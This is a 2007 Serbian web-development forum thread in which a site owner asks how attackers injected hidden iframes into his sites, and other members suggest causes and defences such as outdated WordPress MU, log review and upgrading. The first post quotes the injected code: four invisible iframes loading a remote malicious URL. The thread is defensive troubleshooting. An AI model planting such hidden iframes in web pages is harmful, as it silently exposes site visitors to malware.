DevProTalk

Forumi IT profesionalaca
web development, web design, e-business, SEO


Idite nazad   DevProTalk > Web development i web aplikacije > Web Hosting, web serveri i operativni sistemi
Želite da se reklamirate ekskluzivno na ovoj poziciji? Javite se

Web Hosting, web serveri i operativni sistemi Komercijalni hosting, web serveri, bezbednost, operativni sistemi na serverima

Odgovori
 
Alati teme Način prikaza
Staro 05. 06. 2007.   #1
Djuki
profesionalac
Professional
 
Avatar Djuki
 
Datum učlanjenja: 09.06.2005
Lokacija: Pancevo
Poruke: 251
Hvala: 60
47 "Hvala" u 34 poruka
Djuki is on a distinguished road
Pošaljite ICQ poruku za Djuki Pošaljite poruku preko Skype™ za Djuki
Exclamation Hackovanje i <iframe>

Nekoliko mojih sajtova je hakovano tako sto je ubacen skriveni iframe iframe tag a da nije bilo promene ostalog sadrzaja, sa namerom da sto duze ostane neprimecen, dok mi se desavalo i da obrisu celu stranicu i ostave iframe tagove.

Google me je konatktirao da je na jednoj stranici maliciozni kod koji posetioce moze da zarazi nekim virusom.

Evo koda koji je ostao na jednoj od stranica:
Kôd:
-->--><!-- ~ --><iframe src='http://takesnames.info/st/go.php?sid=' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=1' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=2' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=3' width=1 height=1 style='visibility: hidden;'></iframe><!-- ~ -->
Da li znate na koji nacun su hakovali ove sajtove, i da li ovo rade botovi ?
__________________
Blog | Facebook | Twitter | PHP Srbija
Djuki je offline   Odgovorite uz citat
Staro 05. 06. 2007.   #2
adelante
član
Certified
 
Avatar adelante
 
Datum učlanjenja: 07.08.2005
Poruke: 67
Hvala: 15
0 "Hvala" u 0 poruka
adelante is on a distinguished road
Default

Mislim da je u pitanju bot, koji ima pristup fajlovima na serveru i izmenama istih. Imao sam slučaj kod jednog klijenta da bot isto tako ubaci deo koda u sve stranice koje sadrže "index" u nazivu, čak i one neaktivne.
__________________
Online prodavnica rukotvorina
adelante je offline   Odgovorite uz citat
Staro 05. 06. 2007.   #3
Ivan
Psychedelictrance freak
Wrote a book
 
Avatar Ivan
 
Datum učlanjenja: 04.06.2006
Lokacija: Srbija, Beograd
Poruke: 1.008
Hvala: 325
933 "Hvala" u 34 poruka
Ivan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoro
Pošaljite poruku preko Skype™ za Ivan
Default

Cini mi se da je u tvom slucaju bot, a kako su ubacili ... hm ... ne mogu tacno reci dok ne vidim stranicu ali verovatno imas neki "persistent XSS" propust.
Ivan je offline   Odgovorite uz citat
Staro 05. 06. 2007.   #4
nixa
Nikola Denić
Sir Write-a-Lot
 
Avatar nixa
 
Datum učlanjenja: 18.05.2005
Lokacija: Beograd
Poruke: 3.694
Hvala: 160
458 "Hvala" u 164 poruka
nixa ima spektakularnu aurunixa ima spektakularnu aurunixa ima spektakularnu aurunixa ima spektakularnu aurunixa ima spektakularnu auru
Pošaljite poruku preko Skype™ za nixa
Default

ako koristis smarty pogledaj da li nije malo zastareo
__________________
Do not ask yourself what the world needs. Ask yourself what makes you come alive, and then go do that. Because what the world needs is people who have come alive
nixa je offline   Odgovorite uz citat
Staro 05. 06. 2007.   #5
LiquidBrain
Milan Cvejic
Wrote a book
 
Avatar LiquidBrain
 
Datum učlanjenja: 05.09.2006
Lokacija: Beograd
Poruke: 1.241
Hvala: 32
73 "Hvala" u 56 poruka
LiquidBrain će postati "faca" uskoro
Pošaljite poruku preko Yahoo za LiquidBrain
Talking

Ivane, XSS se moze manifestovati samo uz akcije posetilaca.

Dok kao sto vidimo ovde, njemu je neko dodao kod na stranu Da lici na nekog bot-a, ali
tu je sam kriv zato sto ne vodi racuna o greskama koje software koji on koristi mozda ima.

Da nisi mozda koristio OScommerce?!?

Pozdrav.
__________________
http://weevify.com

Poslednja izmena od LiquidBrain : 05. 06. 2007. u 15:01.
LiquidBrain je offline   Odgovorite uz citat
Staro 05. 06. 2007.   #6
ivanhoe
Ivan Dilber
Sir Write-a-Lot
 
Avatar ivanhoe
 
Datum učlanjenja: 18.10.2005
Lokacija: Bgd
Poruke: 5.320
Hvala: 104
2.344 "Hvala" u 583 poruka
ivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svima
Pošaljite poruku preko Skype™ za ivanhoe
Default

mislim da je postojao ovakav problem sa starijim verzijama Wordpressa, propust koji su botovi koristili da dodaju viruse.. taj se problem resavao apgrejdom..

inace, pogledaj apache log fajlove i pokusaj da snimis trenutak kad se prvi put pojavljuju zahtevi za te ifrejmove, a onda pogledaj par zahteva ispred toga ko je sta pozivao... trebalo bi da tako moze da se nasluti nacin kako su te uhakovali...
__________________
Leadership is the art of getting people to want to do what you know must be done.
ivanhoe je offline   Odgovorite uz citat
Staro 05. 06. 2007.   #7
Ivan
Psychedelictrance freak
Wrote a book
 
Avatar Ivan
 
Datum učlanjenja: 04.06.2006
Lokacija: Srbija, Beograd
Poruke: 1.008
Hvala: 325
933 "Hvala" u 34 poruka
Ivan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoroIvan će postati "faca" uskoro
Pošaljite poruku preko Skype™ za Ivan
Default

@LiquidBrain

Malo ti je nejasan zakljucak, XSS se manifestuje prilikom posete korisnika ali takodje moze da postoji na stranici kao npr neki komentar na nekom busnom blog enginu ... zato sam i napisao "persistent XSS".

Mada moze da bude i bilo sta drugo ali mi je ovaj tip napada prvi pao napamet zbog "bot" pristupa.

O kom software-u je rec ?

Poslednja izmena od Ivan : 05. 06. 2007. u 17:28.
Ivan je offline   Odgovorite uz citat
Staro 06. 06. 2007.   #8
Dragan Babić
Designer guy
Wrote a book
 
Avatar Dragan Babić
 
Datum učlanjenja: 06.06.2005
Lokacija: Novi Sad
Poruke: 1.373
Hvala: 55
42 "Hvala" u 22 poruka
Dragan Babić će postati "faca" uskoro
Pošaljite poruku preko Skype™ za Dragan Babić
Default

Isto (ili slično) se desilo i gomili drugih ljudi, pogledaj na Sheinom blogu. U glavnom došli su do zaključka da se dešava na Dreamhostovim serverima i Wordpress blogovima (ne nužno zajedno).
Dragan Babić je offline   Odgovorite uz citat
Staro 06. 06. 2007.   #9
Djuki
profesionalac
Professional
 
Avatar Djuki
 
Datum učlanjenja: 09.06.2005
Lokacija: Pancevo
Poruke: 251
Hvala: 60
47 "Hvala" u 34 poruka
Djuki is on a distinguished road
Pošaljite ICQ poruku za Djuki Pošaljite poruku preko Skype™ za Djuki
Default

Softver je WordPress MU. Jeste, verzija MU-a jeste zastarela, nisma koristio taj softver i eto. Mada su mi hakovali i sajtove sa cistim php i html fajlovima, bez ikakvog CMS-a.

Sad cu da update-ujem software pa ce vidimo kom opanci ...
__________________
Blog | Facebook | Twitter | PHP Srbija
Djuki je offline   Odgovorite uz citat
Staro 06. 06. 2007.   #10
Ilija Studen
Direktor Kombinata
Invented the damn thing
 
Avatar Ilija Studen
 
Datum učlanjenja: 07.06.2005
Poruke: 2.669
Hvala: 44
119 "Hvala" u 64 poruka
Ilija Studen će postati "faca" uskoroIlija Studen će postati "faca" uskoro
Default

Bitno je da znaš kako su "ušli", fajlovi koje su hakovali su nebitni.

Možeš upasti na jednom mestu i izmeniti milion fajlova. Upadneš kroz WP MU na primer, projuriš sve fajlove sa .html ekstenzijom i ako je pisanje moguće dodaš šta god hoćeš u njih. Ulaz - 1, izmenjenih fajlova - mlogo

Zato uglavnom dajem savete ljudima da izbegavaju free skripte. Treba da ih nadlgedas i krpiš non stop ako ne želiš da navučeš neku bedu. Komercijalni i custom CMS-ovi su manje popularni i u nekim slučajevima dobro napisani tako da si manje ugrožen. No, koliko para toliko muzike

Poslednja izmena od Ilija Studen : 06. 06. 2007. u 11:17.
Ilija Studen je offline   Odgovorite uz citat
Odgovori



Pravila pisanja
Možete ne započinjati nove teme
Možete ne slati odgovore
Možete ne slati priloge
Možete ne izmeniti svoje poruke
vB kôd je Uključen
Smajliji su Uključen
[IMG] kod je Uključen
HTML kôd je Isključen
Pogledajte forum

Slične teme
Tema Početna poruka teme Forum Odgovori Poslednja poruka
Referenca na div koji se nalazi u iframe-u centaur (X)HTML, JavaScript, DHTML, XML, CSS 10 10. 09. 2008. 18:33
[JS] HTML kod IFRAME-a Nemanja Avramović Sva početnička pitanja 6 14. 03. 2008. 20:50
Iframe i JS ivanhoe (X)HTML, JavaScript, DHTML, XML, CSS 5 19. 12. 2006. 22:45
cross-domain scripting i iframe ivanhoe (X)HTML, JavaScript, DHTML, XML, CSS 0 06. 05. 2006. 01:12
javascript, iframe i Opera ivanhoe (X)HTML, JavaScript, DHTML, XML, CSS 2 28. 04. 2006. 14:21


Vreme je GMT +2. Trenutno vreme je 01:20.


Powered by vBulletin® Verzija 3.6.8
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright © DevProTalk. All Rights Reserved.
Mišljenja, saveti, izjave, ponude ili druge informacije ili sadržaji nastali na Sajtu su vlasništvo onoga ko ih je kreirao, a ne DevProTalk.com, tako da ne morate da se oslanjate na njih.
Autori poruka su jedini odgovorni za ovakve sadržaje. DevProTalk.com ne garantuje tačnost, kompletnost ili upotrebnu vrednost informacija, stavova, saveta ili datih izjava. Ne postoje uslovi pod kojima bi mi bili odgovorni za štetu ili gubitak koji je posledica bilo čijeg oslanjanja na nepouzdane informacije, ili bilo kakve informacije nastale kroz komunikaciju između registrovanih članova.
Web sajt može sadržavati linkove na druge web sajtove na Internetu ili neke druge sadržaje. Ne kontrolišemo niti podržavamo te druge web sajtove, niti smo pregledali bilo kakve sadržaje na takvim sajtovima. Mi nećemo biti odgovorni za legalnost, tačnost ili prikladnost bilo kog sadržaja, oglasa, proizvoda, usluga ili informacije lociranim na ili distribuiranih kroz druge web sajtove, niti za bilo kakvu štetu nastalu kao posledica takvih informacija. DevProTalk.com drži i čuva druga prava vlasništva na web sajtu. Web sajt sadrže materijale zaštićene copyright-om, zaštitne znakove i druge informacije o pravu vlasništva ili softver. Članovi mogu poslatu informacije zaštićene pravima vlasništva njihovih nosilaca i ona ostaju zaštićena bez obzira da li su oni koji prenose te informacije to naveli ili ne. Osim informacija koje su u javnom vlasništvu ili za koje dobijete dozvolu, nemate pravo da kopirate, modifikujete ili na bilo koji način menjate, objavljujete, prenosite, distribuirate, izvršavate, prikazujete ili prodajte bilo koju informaciju zaštićenu pravima vlasništva. Slanjem informacija ili sadržaja na bilo koji deo DevProTalk.com, Vi automatski dozvoljavate i predstavljate garanciju da imate pravo da dozvolite DevProTalk.com ili članovima DevProTalk.com bespovratnu, kontinualnu, neograničenu, globalnu dozvolu da koriste, kopiraju, izvršavaju, prikazuju i distribuiraju takve informacije i sadržaje i da iz takvih sadžaja koriste bilo koji deo u bilo koje svrhe, kao i pravo i dozvolu da koriste gore navedene sadržaje. Svi zaštitni znakovi (trademarks), logotipi, oznake usluga, firme ili imena proizvoda koji se pominju na ovom web sajtu su vlasništvo kojim raspolažu njihovi vlasnici.